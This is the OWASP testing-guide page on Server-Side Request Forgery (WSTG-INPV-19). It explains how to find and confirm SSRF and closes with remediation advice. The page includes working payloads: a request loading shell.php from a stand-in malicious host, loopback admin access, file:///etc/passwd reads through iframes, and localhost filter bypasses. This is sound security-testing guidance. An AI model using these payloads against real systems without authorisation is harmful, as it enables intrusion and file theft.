Testing for Server-Side Request Forgery
| ID |
|---|
| WSTG-INPV-19 |
Summary
Web applications often interact with internal or external resources. While you may expect that only the intended resource will be handling the data you send, improperly handled data may create a situation where injection attacks are possible. One type of injection attack is called Server-side Request Forgery (SSRF). A successful SSRF attack can grant the attacker access to restricted actions, internal services, or internal files within the application or the organization. In some cases, it can even lead to Remote Code Execution (RCE).
Test Objectives
- Identify SSRF injection points.
- Test if the injection points are exploitable.
- Asses the severity of the vulnerability.
How to Test
When testing for SSRF, you attempt to make the targeted server inadvertently load or save content that could be malicious. The most common test is for local and remote file inclusion. There is also another facet to SSRF: a trust relationship that often arises where the application server is able to interact with other back-end systems that are not directly reachable by users. These back-end systems often have non-routable private IP addresses or are restricted to certain hosts. Since they are protected by the network topology, they often lack more sophisticated controls. These internal systems often contain sensitive data or functionality.
Consider the following request:
GET https://example.com/page?page=about.php
You can test this request with the following payloads.
Load the Contents of a File
GET https://example.com/page?page=https://malicioussite.com/shell.php
Access a Restricted Page
GET https://example.com/page?page=http://localhost/admin
Or:
GET https://example.com/page?page=http://127.0.0.1/admin
Use the loopback interface to access content restricted to the host only. This mechanism implies that if you have access to the host, you also have privileges to directly access the admin page.
These kind of trust relationships, where requests originating from the local machine are handled differently than ordinary requests, are often what enables SSRF to be a critical vulnerability.
Fetch a Local File
GET https://example.com/page?page=file:///etc/passwd
HTTP Methods Used
All of the payloads above can apply to any type of HTTP request, and could also be injected into header and cookie values as well.
One important note on SSRF with POST requests is that the SSRF may also manifest in a blind manner, because the application may not return anything immediately. Instead, the injected data may be used in other functionality such as PDF reports, invoice or order handling, etc., which may be visible to employees or staff but not necessarily to the end user or tester.
You can find more on Blind SSRF here, or in the references section.
PDF Generators
In some cases, a server may convert uploaded files to PDF format. Try injecting <iframe>, <img>, <base>, or <script> elements, or CSS url() functions pointing to internal services.
<iframe src="file:///etc/passwd" width="400" height="400">
<iframe src="file:///c:/windows/win.ini" width="400" height="400">
Common Filter Bypass
Some applications block references to localhost and 127.0.0.1. This can be circumvented by:
- Using alternative IP representation that evaluate to
127.0.0.1: - Decimal notation:
2130706433 - Octal notation:
017700000001 - IP shortening:
127.1 - String obfuscation
- Registering your own domain that resolves to
127.0.0.1
Sometimes the application allows input that matches a certain expression, like a domain. That can be circumvented if the URL schema parser is not properly implemented, resulting in attacks similar to semantic attacks.
- Using the
@character to separate between the userinfo and the host:https://expected-domain@attacker-domain - URL fragmentation with the
#character:https://attacker-domain#expected-domain - URL encoding
- Fuzzing
- Combinations of all of the above
For additional payloads and bypass techniques, see the references section.
Remediation
SSRF is known to be one of the hardest attacks to defeat without the use of allow lists that require specific IPs and URLs to be allowed. For more on SSRF prevention, read the Server Side Request Forgery Prevention Cheatsheet.
References
- swisskyrepo: SSRF Payloads
- Reading Internal Files Using SSRF Vulnerability
- Abusing the AWS Metadata Service Using SSRF Vulnerabilities
- OWASP Server Side Request Forgery Prevention Cheatsheet
- Portswigger: SSRF
- Portswigger: Blind SSRF
- Bugcrowd Webinar: SSRF
- Hackerone Blog: SSRF
- Hacker101: SSRF
- URI Generic Syntax